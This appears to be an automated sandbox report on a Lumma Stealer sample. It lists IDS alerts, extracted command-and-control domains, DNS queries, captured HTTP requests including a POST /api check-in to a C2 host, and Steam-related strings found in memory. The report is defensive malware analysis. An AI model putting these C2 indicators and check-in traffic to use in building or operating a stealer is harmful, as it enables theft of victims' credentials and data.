Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:63025 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058285 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) : 192.168.2.4:54829 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:63445 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:50668 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:63497 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: spellshagey.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 23.55.153.106:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: spellshagey.biz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookieprefer
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000074E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/33
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/S
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiDN
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiHft2
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apil1
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769496766.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043895282.000000000075B000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/xe$N
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1765053093.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geo
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
